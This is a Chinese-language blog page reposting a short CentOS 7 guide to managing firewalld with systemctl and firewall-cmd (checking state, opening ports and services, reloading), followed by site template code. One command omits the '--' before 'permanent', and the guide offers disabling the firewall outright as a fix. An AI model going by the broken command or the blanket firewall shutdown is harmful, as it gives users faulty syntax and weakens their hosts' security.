    <div class="article-entry" itemprop="articleBody">
       
  <h2 id="CentOS防火墙常用操作"><a href="#CentOS防火墙常用操作" class="headerlink" title="CentOS防火墙常用操作"></a>CentOS防火墙常用操作</h2><blockquote>
<p>转自：<a href="https://www.cnblogs.com/haw2106/p/10730916.html" target="_blank" rel="noopener">https://www.cnblogs.com/haw2106/p/10730916.html</a></p>
</blockquote>
<hr>
<p>注：CentOS7之前用来管理防火墙的工具是iptable，7之后使用的是Firewall</p>
<p>样例：在CentOS7上安装tomcat后，在linux本机上可以访问tomcat主页，<a href="https://link.jianshu.com/?t=http://ip:8080" target="_blank" rel="noopener">http://ip:8080</a>, 但是在其他同网段的机器上却不能访问该地址，原因是因为linux在安装之后默认只开放个别端口供外机访问，这个时候我们只需要将8080端口设置为向外机开放即可。</p>
<p>首先尝试iptables，iptables无效后可尝试防火墙firewalld。</p>
<p>方法一、在外部访问CentOS中部署应用时，需要关闭防火墙。</p>
<p>关闭防火墙命令：<strong>systemctl stop firewalld.service</strong></p>
<p>开启防火墙：<strong>systemctl start firewalld.service</strong></p>
<p>关闭开机自启动：<strong>systemctl disable firewalld.service</strong></p>
<p>开启开机启动：<strong>systemctl enable firewalld.service</strong></p>
<p>方法二、CentOS7使用firewall工具管理防火墙，代替了原来的iptables</p>
<p>操作步骤如下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1 #查看防火墙状态=》使用root的身份=》结果为running</span><br><span class="line">2 firewall-cmd --state</span><br><span class="line">3 #永久性的开放8080端口</span><br><span class="line">4 firewall-cmd --add-port=8080/tcp permanent</span><br><span class="line">5 #重载生效刚才的端口设置</span><br><span class="line">6 firewall-cmd --reload</span><br></pre></td></tr></table></figure>

<p><strong>常用的firewall命令</strong>常用命令介绍</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">firewall-cmd --state                           ##查看防火墙状态，是否是running</span><br><span class="line">firewall-cmd --reload                          ##重新载入配置，比如添加规则之后，需要执行此命令</span><br><span class="line">firewall-cmd --get-zones                       ##列出支持的zone</span><br><span class="line">firewall-cmd --get-services                    ##列出支持的服务，在列表中的服务是放行的</span><br><span class="line">firewall-cmd --query-service ftp               ##查看ftp服务是否支持，返回yes或者no</span><br><span class="line">firewall-cmd --add-service=ftp                 ##临时开放ftp服务</span><br><span class="line">firewall-cmd --add-service=ftp --permanent     ##永久开放ftp服务</span><br><span class="line">firewall-cmd --remove-service=ftp --permanent  ##永久移除ftp服务</span><br><span class="line">firewall-cmd --add-port=80/tcp --permanent     ##永久添加80端口</span><br><span class="line">firewall-cmd --remove-port=80/tcp --permanent  ##永久移除80端口</span><br><span class="line">firewall-cmd --list-ports                      ##查看已经开放的端口</span><br><span class="line">iptables -L -n                                 ##查看规则，这个命令是和iptables的相同的</span><br><span class="line">man firewall-cmd                               ##查看帮助</span><br></pre></td></tr></table></figure>

 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <footer class="article-footer">
       
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CentOS/" rel="tag">CentOS</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E9%98%B2%E7%81%AB%E5%A2%99/" rel="tag">防火墙</a></li></ul>

    </footer>
  </div>

    
 
   
</article>

    
    <article
  id="post-联通学习笔记（二）"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h2 itemprop="name">
  <a class="article-title" href="/2020/08/31/%E8%81%94%E9%80%9A%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88%E4%BA%8C%EF%BC%89/"
    >联通学习笔记（二）</a> 
</h2>
 

    </header>
     
    <div class="article-meta">
      <a href="/2020/08/31/%E8%81%94%E9%80%9A%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88%E4%BA%8C%EF%BC%89/" class="article-date">
  <time datetime="2020-08-31T00:39:31.000Z" itemprop="datePublished">2020-08-31</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a>
  </div>
   
    </div>
      
    <div class="article-entry" itemprop="articleBody">
       
  <h3 id="联通-产业互联网研究中心-实习"><a href="#联通-产业互联网研究中心-实习" class="headerlink" title="联通-产业互联网研究中心-实习"></a>联通-产业互联网研究中心-实习</h3> 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <footer class="article-footer">
       
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E8%81%94%E9%80%9A/" rel="tag">联通</a></li></ul>

    </footer>
  </div>

    
 
   
</article>

    
  </article>
  

  
  <nav class="page-nav">
    
    <span class="page-number current">1</span><a class="page-number" href="/page/2/">2</a><a class="extend next" rel="next" href="/page/2/">下一页</a>
  </nav>
  
</section>
</div>

      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2015-2021
        <i class="ri-heart-fill heart_icon"></i> 文一冲
      </li>
    </ul>
    <ul>
      <li>
        
        
        
        由 <a href="https://hexo.io" target="_blank">Hexo</a> 强力驱动
        <span class="division">|</span>
        主题 - <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>访问人数:<span id="busuanzi_value_site_uv"></span></s>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>浏览次数:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/m.ico" alt="WYC&#39;s Blog"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="搜索">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <script>
      if (window.matchMedia("(max-width: 768px)").matches) {
        document.querySelector('.content').classList.remove('on');
        document.querySelector('.sidebar').classList.remove('on');
      }
    </script>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="/images/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>

<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->


<script src="/js/busuanzi-2.3.pure.min.js"></script>


<!-- ClickLove -->

<!-- ClickBoom1 -->

<!-- ClickBoom2 -->

<!-- CodeCopy -->


<link rel="stylesheet" href="/css/clipboard.css">

<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>


<!-- CanvasBackground -->


    
  </div>
</body>

</html>